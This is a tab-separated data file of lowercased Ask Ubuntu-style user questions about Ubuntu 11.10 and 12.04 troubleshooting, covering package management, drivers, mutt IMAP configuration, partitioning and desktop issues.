122363	using the disk utility application as sudo user in unity or on cli	how do i start the `` disk utility '' program as sudo user , in the unity gui ? if i want to start the application from a cli , what is the application name ? ( there is no reference to the actual program name in the `` about '' box , and typing `` disk utility '' or `` disk utility '' or `` gnome-disk-utility '' does not start the application ! )
122365	how do i use last.fm in rhythmbox without subscribing ?	if i subscribe to last.fm will i be able to listen to last.fm through rhythmbox using the plugin available in the repositories , or is there an alternative way to do this without subscribing ? i would like to be able to listen from within rhythmbox . can anyone confirm that the plugin does play last.fm created radio stations if you subscribe ?
122370	when i attempt to remove g++ why does apt-get attempt to install it ?	note : originally i had a long background explanation leading up to why i was trying to perform apt-get remove g++ . i have deleted that as irrelevant after trying this in a clean install of 11.10 ( 32-bit ) and then , after upgrading , in 12.04 . it appears to be a problem only 12.04 . time to change focus and see if this is a reported bug . i did not find anything that looked related so i reported this as bug # 982716 . while attempting to get rid of a problem compiling octave i removed all the packages needed to compile octave so i could then re-install them . while doing this i ran into an unexpected response from apt-get in 12.04 . when i attempt to remove the g++ package , apt-get instead attempts to install g++-4.6 . i expected to get the message package g++ is not installed , so not removed . why did n't i ? me @ blueubuntu64 : ~ $ sudo apt-get -v -- dry-run remove g++ reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : g++-4.6 ( 4.6.3-1ubuntu4 ) libstdc++6-4.6-dev ( 4.6.3-1ubuntu4 ) suggested packages : g++-multilib ( 4.6.3-1ubuntu5 ) g++-4.6-multilib ( 4.6.3-1ubuntu4 ) gcc-4.6-doc ( 4.6.3-1ubuntu4 ) libstdc++6-4.6-dbg ( 4.6.3-1ubuntu4 ) libstdc++6-4.6-doc ( 4.6.3-1ubuntu4 ) the following new packages will be installed : g++ ( 4.6.3-1ubuntu5 ) g++-4.6 ( 4.6.3-1ubuntu4 ) libstdc++6-4.6-dev ( 4.6.3-1ubuntu4 ) 0 upgraded , 3 newly installed , 0 to remove and 0 not upgraded . inst libstdc++6-4.6-dev ( 4.6.3-1ubuntu4 ubuntu:12.04/precise [ amd64 ] ) [ ] inst g++-4.6 ( 4.6.3-1ubuntu4 ubuntu:12.04/precise [ amd64 ] ) inst g++ ( 4:4.6.3-1ubuntu5 ubuntu:12.04/precise [ amd64 ] ) conf libstdc++6-4.6-dev ( 4.6.3-1ubuntu4 ubuntu:12.04/precise [ amd64 ] ) conf g++-4.6 ( 4.6.3-1ubuntu4 ubuntu:12.04/precise [ amd64 ] ) conf g++ ( 4:4.6.3-1ubuntu5 ubuntu:12.04/precise [ amd64 ] ) update result of specifying -- no-install-recommends option to apt-get . surprisingly ( to me ) seems to fail the same way . will also ( eventually ) update the bug report . ( why not ? ) me @ vbubux86-11 : ~ $ sudo apt-get -v -- dry-run -- no-install-recommends remove g++ [ sudo ] password for me : reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : g++-4.6 ( 4.6.3-1ubuntu4 ) libstdc++6-4.6-dev ( 4.6.3-1ubuntu4 ) suggested packages : g++-multilib ( 4.6.3-1ubuntu5 ) g++-4.6-multilib ( 4.6.3-1ubuntu4 ) gcc-4.6-doc ( 4.6.3-1ubuntu4 ) libstdc++6-4.6-dbg ( 4.6.3-1ubuntu4 ) libstdc++6-4.6-doc ( 4.6.3-1ubuntu4 ) the following new packages will be installed : g++ ( 4.6.3-1ubuntu5 ) g++-4.6 ( 4.6.3-1ubuntu4 ) libstdc++6-4.6-dev ( 4.6.3-1ubuntu4 ) 0 upgraded , 3 newly installed , 0 to remove and 0 not upgraded . inst libstdc++6-4.6-dev ( 4.6.3-1ubuntu4 ubuntu:12.04/precise [ i386 ] ) [ ] inst g++-4.6 ( 4.6.3-1ubuntu4 ubuntu:12.04/precise [ i386 ] ) inst g++ ( 4:4.6.3-1ubuntu5 ubuntu:12.04/precise [ i386 ] ) conf libstdc++6-4.6-dev ( 4.6.3-1ubuntu4 ubuntu:12.04/precise [ i386 ] ) conf g++-4.6 ( 4.6.3-1ubuntu4 ubuntu:12.04/precise [ i386 ] ) conf g++ ( 4:4.6.3-1ubuntu5 ubuntu:12.04/precise [ i386 ] ) me @ vbubux86-11 : ~ $ apt-cache policy g++ g++ : installed : ( none ) candidate : 4:4.6.3-1ubuntu5 version table : 4:4.6.3-1ubuntu5 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise/main i386 packages
122372	use ruby 1.9.3-p125 and remove others	i installed ruby 1.9.3-p125 with rvm . rvm list yields ruby-1.9.3-p125 [ x86_64 ] rvm use 1.9.3-p125 yields using /usr/share/ruby-rvm/gems/ruby-1.9.3-p125 running /usr/share/ruby-rvm/hooks/after_use however , ruby -- version is ruby 1.8.7 , ( which ruby is /usr/bin/ruby ) . i also have two executables : ruby1.8 and ruby1.9.1 , but nothing called ruby1.9.3 is on the path . how do i actually get ruby to run ruby1.9.3 ( or at the very least , how do i run it at all ) . once i can do that , i 'd also like to uninstall the other ruby versions since they 're just taking up space .
122373	how do i airport-utils to configure my airport extreme ?	i 'm trying to use this package ( airport-utils ) to try to configure my airport extreme . i was able to install it without a problem using apt-get but when i try to use it nothing happens . literally , nothing : shreyas @ shreyas-laptop : ~ $ airport2-portinspector shreyas @ shreyas-laptop : ~ $ no windows open , nothing . i tried calling ps aux and grepping for anything that might hint to the command actually doing something but i came up empty . does anyone have any experience with this package and can help me , or is there something else i can do to work with my airport extreme ?
122376	gnotime help hogs my system	in gnotime , when i open help , the help system hogs my system resources and simply displays an empty yelp screen . if i run gnotime in terminal , i get this message : gtt : gconf : warning : get /apps/gnotime/logfile/filename failed : using default value i am running it on linux 3.0.0-17-generic on an hp , on an amd64 system , with ubuntu 11.10 ( oneiric ) . thanks in advance .
122379	'can not mount /dev/loop0 ' fault during installation cd booting	i have currently windowsxp installed in my computer . i burned ubuntu 10.04 into a cd and then inserted the cd into the drive and booted . when the cd boots i get to a terminal screen that outputs : busybox v1.13.3 ( ubuntu 1:1.13.3-1ubuntu11 ) built in shell ( ash ) enter 'help ' for a list of built-in commands . ( initramfs ) can not mount /dev/loop0 ( /cdrom/ccasper/filesystem.squashfs ) on //filesystem.squashfs how do i deal with this ?
122380	dualboot ( win7 & ubuntu ) on ssd	advice please . can i install windows 7 ( windows 8 ) and ubuntu on an ssd with the ability to dualboot ? and if so , how best to partition the disk ? ssd - vtx3-25sat3-60g for example : 1 . windows - 25gb 2 . linux - 25gb 2.1 /boot - 300mb 2.2 / - 20gb 2.3 /swap - 2.7gb ( 16gb ram , just in case ) and as in this case , it is best to align the sections ?
122381	where can i change the webpage shown by apache ?	i have ubuntu 10.10 installed , and when i hit my ip i see : it works ! this is the default web page for this server . the web server software is running but no content has been added , yet . where should i look to see where this is being served from ? the strange thing is , i just installed nginx and setup a static page that is served on port 80 also ( should be conflicting with the default apache that is serving the 'it works page ' ) , when i restart nginx i do n't get bind error sayign port 80 is already taken . i dont ' use apache , and do n't want it but the default install seems to have it . i ahve no idea where it is , i do n't see it in /opt or etc/apache . thanks !
122383	eye of gnome image bug with ati graphic driver	i just installed the ati driver for my ubuntu 11.10 . after some annoying bugs and errors it works for now . but there is one most stupid bug . whenever i open a picture in the default image viewer ( eye of gnome eog ) it shows me an overexposed picture . example with eog : example how it should be : how can i fix this ? update driver i used was 8.911-111025a-128237c-ati with catalyst 11.11 . i installed the driver via jockey and used the driver released with ubuntu because the post-release driver fails everytime . update 2 now i have latest updates installed from ati download page . everything works nice except the described view bug . it 's still the same bug with ubuntu 12.04 . i also reinstalled eog .
122390	how to troubleshoot gpu freezes ?	so in advance i 'll just say i am a total linux newbie , so be kind . i just downloaded ubuntu 11.10 and this is my first experience with linux . i enjoy it so far and actually enjoy it except for when my computer freezes . this has been quite often so far . i 've done a little research and it seems my problem is with the gpu . when it does freeze i can move the cursor but can not click on anything . i also can not run alt+f2 xkill . so my only previous experience has been with windows and i would normally solve an issue like this with ctrl+alt+delete and just shut down the offending program . i do not know how to do this in ubuntu and not even sure this would even work . please help me if you can , how do i deal with a freeze without having to resort to a hard shutdown , i can not seem to run the computer over one hour without experiencing this issue . i tried accessing my grub menu on startup but i ca n't even seem to do that . also the only real program i have been running whenever this happens seems to be firefox . thank you , appreciate any help . after running lspci | grep vga command prompt : 00:12.0 vga compatible controller : nvidia corporation c67 [ geforce 7150m / nforce 630m ] ( rev a2 ) *****
122393	which ubuntu-list for feedback on 11.10 to 12.04 upgrade issues ?	i upgraded to ubuntu 12.04 beta2 via sudo do-release-upgrade -d and have identified a few ... glitches and issues in the process/script , mostly from an end-user 's perspective . there seems to more than one list that might fit , in the ubuntu-devel- or perhaps ubuntu-qa- or even ubuntu-desktop- hierarchies . i know about launchpad , brainstorm , bugsquad , etc , but am looking for the mailing-list where the people who develop this specific process discuss it . in my experience , asking the person who knows the answer is much quicker than doing your own research . : ) cheers , alec . ( a retired computer guy with many years experience in the software development cycle , including oss )
122394	can not access my update manager	i can not open my update manager it says : e : malformed line 54 in source list /etc/apt/sources.list ( dist parse ) , e : the list of sources could not be read . i ca n't install anything using sudo in my terminal also . it gives me the same message . could you tell me what the problem is . thanks . regards vaishnavi
122396	why do i have 2 bluetooth icons on my panel ?	im not sure i should be reporting this as a bug as it may have been something i have have done to cause this . i have duplicate icons on my panel for bluetooth and would like to remove them both . terminal reading 1074 ? ss 0:00 /usr/sbin/bluetoothd 5036 ? sl 0:02 /usr/bin/python /usr/bin/blueman-applet 5040 ? sl 0:00 bluetooth-applet 5872 pts/0 s+ 0:00 grep -- color=auto blue i did a bit of exploring in synaptic package manager but unfortunately , i 'm none the wiser , however one is the blueman project the other is gnome .
122397	how to change icon of an webapp created with chromium ?	i 've created a webapp for a website with chromium . the problem is that the icon it 's a small size one and it does n't look nice . how can i change the icon with one created by me ?
122398	how can i change the folder where vlc stores its streams ?	stream records of vlc ( by pressing the red `` record '' button ) are stored in ~/downloads/ . can this be canged , and how ? i could n't find this option in settings .
122400	`` serious errors found hf checking the drive for /home '' after moving /home to external hfsplus partition	i just installed mac os x 10.7 `` lion '' and ubuntu 11.10 on my macbook pro using these instructions : creating a shared home partition between linux and mac os x . after changing the location of my home folder to the new location , it gives me the error in the title , and my username no longer appears in the login screen . using the `` other '' option with my username seems to make it try to log in , but the screen quickly flashes between blank and a shell before kicking me back to the login screen without notice . i 'm trying to share my home folder between mac os x and ubuntu , using an hfsplus partition ( unjournaled ) between the two . the home partition seems to mount fine as /home , and i am able to modify it under ubuntu . below is the line i 've added to fstab : /dev/sda3 /home hfsplus defaults 0 1 i should also note that i changed my account 's username and home directory location to match this , though i 've double checked that and everything seems in order there ... thank you in advance for any assistance . edit : it seems that the /etc/passwd file did n't have my new home directory 's location in it , so i changed that , and i am now able to log into my account , although i am still not listed in the login screen , and my username in the menu on the top right shows up as `` [ invalid utf-8 ] '' ...
122405	what could be the reason for my resolution to be right running 11.10 on virtualbox and not on machine ?	when i install ubuntu 11.10 on my virtualbox ( running on windows 7 ) and update the packages , it recognizes the display as the virtualbox display , and gives me the options of various resolutions , one of them being right for my display , all works well . but then , when i install it on my machine ( like was windows 7 ) it does n't give me the resolution options , even with the system updated and the openchrome graphics driver installed ( which was also when running on virtualbox ) . what could be the reason for this happening ? ( could the vb guest software influence on this ? )
122409	just reinstalled my 12.04 - i want to have back the option to choose between unity , gnome , gnome-classic & gnome classic-no effects - help ?	how do i go about installing not only the gnome-classic fallback but also installing the regular gnome , and gnome-classic-noeffects ?
122410	which is the best hard drive to install ubuntu on ?	i have a 40 gig drive and a 200 gig drive . which one should i install ubuntu on , and which one should i use for my normal files ie : music , documents , etc ...
122418	tool to scan similar images	what tools might be available in ubuntu to scan many image files and detect similar ones despite different sizes , formats , etc ? support for batch mode/cli would be especially good . for example , so i could write a script to favor the higher resolution/color depth versions and delete others .
122420	how can i install the ati video card driver for ubuntu 11.10 ?	how can i install the ati video card driver for ubuntu 11.10 ? can someone please help me ?
122428	how to run .sh file	i want to download jdownloader from the internet for linux . but the file is .sh and when i tell ubuntu to open the file it uses some text editor . i searched ubuntu software store and there was no application to open it . is there any way i can get it installed ?
122432	driver amd radeon hd 6320 for ubuntu 11.10 64 bits	i downloaded this driver from official page of amd , but i ca n't reproduce videos in 1080p and i can do this in windows . so i wish solve this problem for can reproduce hd in a lenovo s205
122437	how to access `` applications '' menu in ubuntu unity desktop	i 've installed ubuntu 11.10 with the new unity desktop . i understand that i can access the classic `` applications '' menu by switching to gnome . however , i was wondering if it 's possible to access the menu thru the unity desktop . if not , then what is the best way to access the installed programs ?
122443	how do i get ubuntu to connect to my android tablet ?	what i 'm doing is trying to run a software called gmtp , which is apparently what i need to do to transfer files back and forth to my android galaxy 10.1 tab device . i 've asked about it on the android se site , but it seems the problem might be on the ubuntu side . i followed these instructions to get ubuntu to support mtp . however , when i run the software , i get `` libmtp panic '' and other errors . $ gmtp device 0 ( vid=04e8 and pid=6860 ) is a samsung gt-p7510/galaxy tab 10.1 . ptp_error_io : failed to open session , trying again after resetting usb interface libmtp libusb : attempt to reset device libmtp panic : failed to open session on second attempt detect : unable to open raw device ? libmtp panic : trying to dump the error stack of a null device ! libmtp panic : trying to clear the error stack of a null device ! it seems that the problem is on the ubuntu side , so is there something i can do to fix it ?
122445	how to quickly and thoroughly use a livecd to test for hardware incompatibility ?	often people wanting to know if ubuntu will run on a potential hardware purchase are advised to use the livecd , perhaps in-store , to check hardware compatibility . for example , this answer suggests drivers will usually not be an issue if they work off the livecd , but it also says to test `` extensively '' . given that if you do this in-store , you 'll have a limited time period to do the testing , what is the most efficient way to test the computer ? for example , after running a program like vlc to check video and audio ... is it then necessary to try a music player too ? what settings should be checked ? let 's assume i am interested in all the usual laptop functions ( suspend , hibernate , wireless ) , in addition to things like built-in webcam , microphone , etc . also , if the laptop does n't have an optical drive ( like some of the newer thin laptops ) , then i would have to boot from usb . is this just as reliable as testing from the cd ? ( i feel silly asking this , but i know some laptops behave differently booting from usb , e.g . apple )
122446	ca n't suspend on acer aspire one 722 using proprietary amd drivers	i have an acer aspire one 722 netbook with a c60 cpu and a ati radeonâ˘ hd 6250 gpu . i am trying to decrease the power usage and have tried jupiter and powertop , but the lowest power usage has been by installing the proprietary driver . i installed the most recent driver from the amd website ( amd-driver-installer-12-3-x86.x86_64.run ) and the power consumption is very , but now the system wo n't resume from suspend . this site says suspend works ( i tried editing the /etc/x11/xorg.conf mentioned , but it did n't fix the issue ) http : //wiki.cchtml.com/index.php/ubuntu_natty_installation_guide # suspend.2fhibernation but this site says it doesn't https : //help.ubuntu.com/community/aspireone522 # suspend_and_hibernate i am running 11.04 with kernel 3.0.0-12
122447	best command line tool to join videos	i have used ffmpeg , but with it you have to first make mpg videos then do cat video1.mpg video2.mpg > joined.mpg and then convert to joined.mpg to joined.mp4 with ffmpeg to be able to upload on youtube . i heard there 's mencoder which can join avi files without converting to mpg and using cat command . i 'm making videos to upload on youtube so it needs to be avi mp4 or flv format . which tool is the best to join videos from command line ?
122454	ca n't upgrade to 12.04	i need help i upgrade from 11.10 .but i ca n't continue the upgrade it says can not upgrade an upgrade from 'precise ' to 'oneiric ' is not supported with this tool
122455	creating an icon for indicator applet in vala	i 'm writing a program that uses a panel indicator , and i want to use an icon i 've created . i can package the application so it installs my icon in usr/share/icons but i ca n't get the icon to show up in the panel when i run the program , and the indicator ends up not having an icon . any advice ?
122459	bash terminal/console strange overlapping behavior	i am using gnome-terminal in ubuntu 11.10 and seem to get long lines overlapping in the terminal window . when i copy a long command line and paste it into the terminal , the text gets overlapped to the start of the line and often covers the user prompt . if i resize the terminal window , making it wider the overlapping gets undone and everything looks normal . in previous versions of ubuntu , if a line was too long it would continue on the next line below . another problem i have noticed that may be related , is when using the up arrow key to show previously typed commands , sometimes instead of the output command line being replaced by the previous command each time the key is pressed , the lines get partially merged . a portion of the old line remains , and the next command gets joined onto the end . this leftover part of a command is persistent and does not get replaced next time the key is pressed , although the insertion point or blinking cursor is at the end of the latest recalled command , and the leftover has no effect if i press enter . is this problem a bug or some setting that needs fixing ? where do i look for the cause ? keyboard ? gnome-terminal ? bash ? thank you for any help or suggestions offered
122463	sound not working after installing pci video card and then removing it	i am running 11.10 on a hp/compaq presario sr1010z , and the video/audio was working fine with whatever was in the machine already . then i installed a new video card ( pci/nvidia ) , which disabled the audio/video on the old one automatically . but that card did n't work out too well so i removed it . now the video is back to normal , but the audio is gone . i have tried the following : in bios , set audio to on/enable rather than auto looked for hardware in system settings > sound , but nothing shows up there but when i run the sysinfo utility , i get the description of the audio controller when i do a sudo aplay -l , i get : aplay : device_list:240 : no soundcards found ... and then when i do a lspci -v | grep -a7 -i `` audio '' , i get the following : 00:02.7 multimedia audio controller : silicon integrated systems [ sis ] sis7012 ac'97 sound controller ( rev a0 ) subsystem : hewlett-packard company device 2a05 flags : bus master , medium devsel , latency 32 , irq 5 i/o ports at a000 [ size=256 ] i/o ports at a400 [ size=128 ] capabilities : < access denied > 00:03.0 usb controller : silicon integrated systems [ sis ] usb 1.1 controller ( rev 0f ) ( prog-if 10 [ ohci ] ) any ideas on how to fix this ? thanks
122464	move the home directory back to single partition	i 've seen a ton of tutorials on how to move your home directory to a separate partition . i want to do the opposite . i have two hdds . one /home/ and the other is everything else ( both drives have only one partition ) . i want to use one of the hard drives for another project . so , i 'd like to move the home directory and system files back onto a single drive . thank you !
122465	regulating outgoing traffic on a virtual machine ?	i am making a virtual network setup for my high school cybersecurity team to practice . i am connecting all the vms together through a vpn and then people who are practicing will vpn in and ssh/remote desktop into the different vms . the problem is that for practicing , they will need root access into the vms and because the vms are connecting to my personal network , the vms pose a security risk to my personal network . is there any way in either vmware or virtualbox or even making an unchangeable iptable ( i can make all the windows vms go thru a linux vm ) to prevent people from connecting to my local network via the vm ?
122469	can i save some time from typing `` optirun '' ?	as title , i 've installed bumblebee and now my nvidia graphics card is enabled . however , i have to type `` optirun '' before the command i want to executed ( e.x . $ optirun openrave ) to change the graphics card to the nvidia optimus one , and it sometimes cause some trouble if i do n't . is there any tip that i can automatically change the graphics card mode to the nvidia optimus one ?
122470	why does ubuntu create the file /var/log/boot ?	why does ubuntu 10.04.4 and 11.10 create the file /var/log/boot and does not fill it except with the text : `` ( nothing has been logged yet . ) '' ?
122473	delete alt-f2 history	can anybody tell me configuration or file address where it is ( on gnome 3 ) . on gnome2 it was in config /apps/gnome-settings/gnome-panel/history-gnome-run
122474	how to fix a non functional gui after fresh install ?	so after a fresh install unity and my entire desktop does not want to work . i 'm not able to drag any windows click in any fields or any buttons . the only way to navigate any window after opening is by using keyboard shortcuts i.e . tab , arrow keys , spacebar , etc . i manages to install gpu drivers but that didnt fix anything , this wasnt a problem when i was running the disk live . it 's only after install . system specs : gpu : amd radeon 6870 - ram:2x 8gb 1600 - cpu : amd phenom ii x4 965be
122478	dynamic resizing of screen does n't work in parallels	i was already running the latest parallels 7 build when i upgraded to ubuntu 11.10 . dynamic resizing of the screen was working in prior versions of ubuntu . in the process of trying to fix this i reinstalled the parallels tools and it made no difference . the screen resolution is `` stuck '' at 800x600 -- thats all that the system can detect . i have 256mb configured for video memory in the vm . output from xrandr : xrandr : failed to get size of gamma for output default screen 0 : minimum 800 x 600 , current 800 x 600 , maximum 800 x 600 default connected 800x600+0+0 0mm x 0mm 800x600 75.0* i would try to add a screen resolution , but i do n't know what the parallels vm supports . has anyone figured this out ?
122480	how to manage multiple imap accounts with mutt	i love mutt , and the mutt version shipped with ubuntu is awesome ( it even has a patched version ) , the only caveat i 've found so far it 's that i had not been able to manage several imap accounts at the same time . currently my mutt setup looks like this : # $ home/.mutt/muttrc === accounts ==== set my_decrypt=`gpg -o $ home/.mutt/accounts/passwd.gpg.tmp -d $ home/.mutt/accounts/passwd.gpg` set my_first_mail_passwd=`awk '/xxxxx @ foo.com : / { print $ 2 } ' $ home/.mutt/accounts/passwd.gpg.tmp` set my_second_mail_passwd=`awk '/yyyyy @ bar.com : / { print $ 2 } ' $ home/.mutt/accounts/passwd.gpg.tmp` set my_rm=`rm -f $ home/.mutt/accounts/passwd.gpg.tmp` source $ home/.mutt/accounts/xxxxx @ foo.com/xxxxx @ foo.com.profile //source $ home/.mutt/accounts/yyyyy @ bar.com/yyyyy @ bar.com.profile which means that a password.gpg file is decrypted on the fly ( where my email passwords live ) use it to set some vars and deleted , also a default profile is sourced , it looks like this : # $ home/.mutt/accounts/xxxxx @ foo.com/xxxxx @ foo.com.profile set folder = `` imaps : //imap.foo.com '' set spoolfile = `` imaps : //imap.foo.com/inbox '' set header_cache = `` $ home/.mutt/cache/xxxxx @ foo.com.headers '' set message_cachedir = `` $ home/.mutt/cache/xxxxx @ foo.com.bodies '' set imap_user = `` xxxxx @ foo.com '' set imap_pass = $ my_first_mail_passwd set smtp_url = `` smtp : //xxxxx @ smtp.foo.com '' set smtp_pass = $ my_first_mail_passwd using this , i 'm only able to use the account configured in the default profile.. , i 've heard that folder hooks can be used but i 've no idea how to use them , and i 'm also not sure if that 's what i 'm looking for , i 'd like to just be able to source different profiles depending which email i 'd like to read.. , any suggestion method is welcome.. , i 'd prefer a setup who do n't rely on external programs who are n't part of a default ubuntu installation .
122483	32-bit or 64-bit for a intel celeron 2.93ghz processor ?	i read somewhere that ubuntu 12.04 64-bit is recommended by canonical.. but my machine is not amd64.. so which one should i prefer ? 64-bit or 32-bit ?
122493	why is 12.04 removing the -server kernel flavour ?	ubuntu is removing -server flavour , as specified on release notes of 12.04 : https : //wiki.ubuntu.com/precisepangolin/releasenotes/ubuntudesktop # precisepangolin.2bac8-releasenotes.2bac8-commoninfrastructure-1.kernel as with beta-1 , the beta-2 kernel no longer carries separate amd64 -server and -generic kernel flavors . these have been merged into a single -generic kernel flavor to help reduce the maintenance burden over the life of this lts release . the differences between -generic and -server seems to be related to preempting , the timer interrupt and the i/o scheduler , as stated on : https : //help.ubuntu.com/10.10/serverguide/c/preparing-to-install.html # intro-kernel-diffs i 'm asking for technical specs . so , what happens now ? will the server edition run the desktop kernel with no performance penalty ? is this justified somehow ? what happens with that differences ? can they be changed in userspace ? there are not appllicable as of 12.04 ? if the answer is yes , this change will involve performance penalty ? all of them are questions that can be answered . i 'm asking for a specific change on a package , not anything else .
122497	not able to compile dbus-ping-pong	i have downloaded files from http : //cgit.collabora.com/git/user/alban/dbus-ping-pong.git/tree/ i am trying to compile it using the command gcc pkg-config -- libs -- cflags dbus-1 dbus-glib-1-2 glib-2.0 -o dbus-ping-pong dbus-ping-pong.c however , i get errors : /tmp/ccmjkxxb.o : in function g_once_init_enter : dbus-ping-pong.c : ( .text+0x22 ) : undefined reference to g_once_init_enter_impl /tmp/ccmjkxxb.o : in function dbus_glib_marshal_echo_srv__boolean__string_pointer_pointer : dbus-ping-pong.c : ( .text+0x52 ) : undefined reference to g_return_if_fail_warning dbus-ping-pong.c : ( .text+0x79 ) : undefined reference to g_return_if_fail_warning dbus-ping-pong.c : ( .text+0x9d ) : undefined reference to g_value_peek_pointer dbus-ping-pong.c : ( .text+0xac ) : undefined reference to g_value_peek_pointer dbus-ping-pong.c : ( .text+0x109 ) : undefined reference to g_value_set_boolean /tmp/ccmjkxxb.o : in function echo_ping_class_intern_init : dbus-ping-pong.c : ( .text+0x122 ) : undefined reference to g_type_class_peek_parent /tmp/ccmjkxxb.o : in function echo_ping_get_type : dbus-ping-pong.c : ( .text+0x162 ) : undefined reference to g_intern_static_string dbus-ping-pong.c : ( .text+0x192 ) : undefined reference to g_type_register_static_simple dbus-ping-pong.c : ( .text+0x1a8 ) : undefined reference to g_once_init_leave /tmp/ccmjkxxb.o : in function echo_ping_class_init : dbus-ping-pong.c : ( .text+0x1cd ) : undefined reference to g_type_class_add_private dbus-ping-pong.c : ( .text+0x1e2 ) : undefined reference to dbus_g_object_type_install_info /tmp/ccmjkxxb.o : in function echo_ping_init : dbus-ping-pong.c : ( .text+0x1fe ) : undefined reference to g_type_instance_get_private /tmp/ccmjkxxb.o : in function echo_ping : dbus-ping-pong.c : ( .text+0x21d ) : undefined reference to g_strdup /tmp/ccmjkxxb.o : in function client : dbus-ping-pong.c : ( .text+0x265 ) : undefined reference to dbus_g_proxy_new_for_name dbus-ping-pong.c : ( .text+0x2c3 ) : undefined reference to dbus_g_proxy_call dbus-ping-pong.c : ( .text+0x2d1 ) : undefined reference to dbus_g_error_quark dbus-ping-pong.c : ( .text+0x2f1 ) : undefined reference to dbus_g_error_get_name dbus-ping-pong.c : ( .text+0x305 ) : undefined reference to g_printerr dbus-ping-pong.c : ( .text+0x31d ) : undefined reference to g_printerr dbus-ping-pong.c : ( .text+0x328 ) : undefined reference to g_error_free dbus-ping-pong.c : ( .text+0x358 ) : undefined reference to g_print dbus-ping-pong.c : ( .text+0x363 ) : undefined reference to g_free /tmp/ccmjkxxb.o : in function main : dbus-ping-pong.c : ( .text+0x38f ) : undefined reference to g_type_init dbus-ping-pong.c : ( .text+0x3a3 ) : undefined reference to dbus_g_bus_get dbus-ping-pong.c : ( .text+0x3c7 ) : undefined reference to g_object_new dbus-ping-pong.c : ( .text+0x3df ) : undefined reference to g_type_check_instance_cast dbus-ping-pong.c : ( .text+0x3f9 ) : undefined reference to dbus_g_connection_register_g_object dbus-ping-pong.c : ( .text+0x406 ) : undefined reference to dbus_g_connection_get_connection dbus-ping-pong.c : ( .text+0x426 ) : undefined reference to dbus_bus_request_name dbus-ping-pong.c : ( .text+0x43a ) : undefined reference to g_main_loop_new dbus-ping-pong.c : ( .text+0x44a ) : undefined reference to g_main_loop_run how do i resolve this issue ?
122499	terminal ( plugin ) does not work inside gedit ( ubuntu 12.04 )	after installing the gedit plugins and activating the terminal plugin through the preferences command , i noticed that entering commands inside the terminal is impossible ! the terminal is inactive and i see no cursor . is this a known bug ? thank 's in advance for your help .
122505	how do i create a completely unattended install of ubuntu ?	i need a cd or usb stick , that will install ubuntu on a completely headless machine . stick cd in and restart , no keyboard or screen should be involved . there are a few obstacles : the language selection menu when you first boot the cd . the fact that the cd menu waits . the installer 's asking questions during installation .
122507	sd-card reader does not show in ubuntu	i bought acer asipre 4250 . it have built-in sd card reader . but it is not working . nothing show in /media or fdisk but something in dmesg . dmesg : new high-speed usb device number 3 using ehci_hcd [ 127.396733 ] scsi5 : usb-storage 2-2:1.0 [ 128.526562 ] scsi 5:0:0:0 : direct-access multiple card reader 1.00 pq : 0 ansi : 0 [ 128.532512 ] sd 5:0:0:0 : attached scsi generic sg2 type 0 [ 129.008110 ] ohci_hcd 0000:00:12.0 : pci int a disabled [ 129.032083 ] ohci_hcd 0000:00:13.0 : pci int a disabled [ 129.056411 ] ohci_hcd 0000:00:16.0 : pci int a disabled [ 129.338026 ] sd 5:0:0:0 : [ sdb ] attached scsi removable disk [ 129.808328 ] ohci_hcd 0000:00:14.5 : pci int c disabled [ 167.728616 ] usb 2-2 : usb disconnect , device number 3 [ 169.872284 ] ehci_hcd 0000:00:13.2 : pci int b disabled [ 169.872340 ] ehci_hcd 0000:00:13.2 : pme # enabled fdisk -l : disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x0006bc6d device boot start end blocks id system /dev/sda1 * 2048 48828415 24413184 7 hpfs/ntfs/exfat /dev/sda2 48828416 50829311 1000448 82 linux swap / solaris /dev/sda3 50829312 99657727 24414208 83 linux /dev/sda4 99659774 625141759 262740993 5 extended partition 4 does not start on physical sector boundary . /dev/sda5 99659776 275439615 87889920 7 hpfs/ntfs/exfat /dev/sda6 275441664 451221503 87889920 7 hpfs/ntfs/exfat /dev/sda7 451223552 625141759 86959104 7 hpfs/ntfs/exfat i found another problem just right now . i format last three drives as ext4 with disk utility . but they are showing as ntfs/exfat in fdisk . : - (
122508	how to stop ubuntu loading/booting up ?	i have loaded ubuntu 11.10 onto my windows 7 netbook . now , i think it loaded onto drive d. when starting the netbook it will automatically go into ubuntu start up and i have no options to start windows ! please help , how do i get my windows 7 back ? : -/ nigel
122511	laptop on ubuntu-com logo	i want to ask one , maybe a little fun , question ) what laptop ( model ) is in the picture on the http : //www.ubuntu.com/ ? i see that this is acer , but what model ? does anybody know ?
122512	slow writing hdd speed dues to a misaligned partition	it seems that ( but i 'm not completely sure ) , that when i 'm copying files from gigabit network to hdd , i ca n't use full potential of the network which in my case is about 60 mb/s , because hdd writing is so slow like lower than 10 mb/s , and also it 's slowing down the whole system which becomes pretty much unresponsive , almost impossible to work with . copying files to samba share residing at ubuntu machine , connected to share from windows 7 , i 'm completely sure my network equipment is ok , and there 's no cpu intensive process on ubuntu except smbd getting about 10-20 % from time to time which i think is ok. something here is burried deep i think , maybe even in kernel . already tried to switch from ahci to compatibility mode , and turning acpi on and off - nothing helped . so it 's like hdd buffer is full and emptying slowly while machine is sluggish , load is about 3 to 4 . somebody experienced the similar problems ? some help on troubleshooting process and identifying the cause would be helpful too : )
122530	is there any performance difference between ubuntu unity and classic/fallback ?	is there any difference between using ubuntu unity and gnome classic/fallback ? just to be clear , i 'm not talking about the launcher or the dash . of course ubuntu classic/fallback does n't have the launcher/dash , but this is not the difference i 'm talking about . i mean differences related to performance , features , functionalities , compatibilities , etc . these kinds of differences . i 'm asking this because i 've heard the fallback mode is kind of `` incomplete '' when it 's compared to gnome shell or ubuntu unity , so i just wanted to know whether or not it 's true , because if it 's true , i do n't think using fallback mode is worth it .
122532	how can i listen to my guitar in realtime via the microphone input ?	i can playback my guitar through the mic in once i 've recorded something , but i ca n't hear the guitar in real-time as i could in windows ?
122533	need help with missing pics !	i recently uploaded over one hundred photos from my camera into shotwell and i got the message that they were successfully uploaded , deleted from my memory card and then when i went to view the pics they were not there . in shotwell it is saying that my last import was on mar 30 when it was actually apr 13 . please help !
